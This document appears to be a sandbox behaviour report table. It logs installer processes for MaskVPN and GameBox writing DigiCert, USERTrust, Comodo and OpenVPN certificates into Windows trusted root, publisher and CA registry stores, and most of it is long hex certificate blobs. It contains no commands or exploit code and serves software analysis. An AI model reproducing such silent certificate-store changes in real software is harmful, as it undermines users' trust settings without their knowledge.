| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 5c000000010000000400000000100000190000000100000010000000ea6089055218053dd01e37e1d806eedf0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0400000001000000100000001bfe69d191b71933a372a80fe155e5b52000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd | C:\Users\Admin\AppData\Local\Temp\is-V4ULV.tmp\Setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 0300000001000000140000008d4c4a23ba9ee84ea7348fa98cc6e65fbb69de7b140000000100000014000000bbaf7e023dfaa6f13c848eadee3898ecd93232d4040000000100000010000000ab9b109ce8934f11e7cd22ed550680da0f0000000100000030000000a768343c4aeaced5c72f3571938864983a67ed49031c1da2495863caf65fe507011f7f0e70b6cb40e5631c07721be03419000000010000001000000082218ffb91733e64136be5719f57c3a15c0000000100000004000000001000001800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000820500003082057e30820466a003020102021067def43ef17bdae24ff5940606d2c084300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a308185310b3009060355040613024742311b30190603550408131247726561746572204d616e636865737465723110300e0603550407130753616c666f7264311a3018060355040a1311434f4d4f444f204341204c696d69746564312b302906035504031322434f4d4f444f205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010091e85492d20a56b1ac0d24ddc5cf446774992b37a37d23700071bc53dfc4fa2a128f4b7f1056bd9f7072b7617fc94b0f17a73de3b00461eeff1197c7f4863e0afa3e5cf993e6347ad9146be79cb385a0827a76af7190d7ecfd0dfa9c6cfadfb082f4147ef9bec4a62f4f7f997fb5fc674372bd0c00d689eb6b2cd3ed8f981c14ab7ee5e36efcd8a8e49224da436b62b855fdeac1bc6cb68bf30e8d9ae49b6c6999f878483045d5ade10d3c4560fc32965127bc67c3ca2eb66bea46c7c720a0b11f65de4808baa44ea9f283463784ebe8cc814843674e722a9b5cbd4c1b288a5c227bb4ab98d9eee05183c309464e6d3e99fa9517da7c3357413c8d51ed0bb65caf2c631adf57c83fbce95dc49baf4599e2a35a24b4baa9563dcf6faaff4958bef0a8fff4b8ade937fbbab8f40b3af9e843421e89d884cb13f1d9bbe18960b88c2856ac141d9c0ae771ebcf0edd3da996a148bd3cf7afb50d224cc01181ec563bf6d3a2e25bb7b204225295809369e88e4c65f191032d707402ea8b671529695202bbd7df506a5546bfa0a328617f70d0c3a2aa2c21aa47ce289c064576bf821827b4d5aeb4cb50e66bf44c867130e9a6df1686e0d8ff40ddfbd042887fa3333a2e5c1e41118163ce18716b2beca68ab7315c3a6a47e0c37959d6201aaff26a98aa72bc574ad24b9dbb10fcb04c41e5ed1d3d5e289d9cccbfb351daa747e584530203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e04160414bbaf7e023dfaa6f13c848eadee3898ecd93232d4300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c050003820101007ff25635b06d954a4e74af3ae26f018b87d33297edf840d2775311d7c7162ec69de64856be80a9f8bc78d2c86317ae8ced1631fa1f18c90ec7ee48799fc7c9b9bccc8815e36861d19f1d4b6181d7560463c2086926f0f0e52fdfc00a2ba905f4025a6a89d7b4844295e3ebf776205e35d9c0cd2508134c71388e87b0338491991e91f1ac9e3fa71d60812c364154a0e246060bac1bc799368c5ea10ba49ed9424624c5c55b81aeada0a0dc9f36b88dc21d15fa88ad8110391f44f02b9fdd10540c0734b136d114fd07023dff7255ab27d62c814171298d41f450571a7e6560afcbc5287698aeb3a853768be621526bea21d0840e494e8853da922ee71d0866d7 | C:\Users\Admin\AppData\Local\Temp\is-V4ULV.tmp\Setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d4304000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d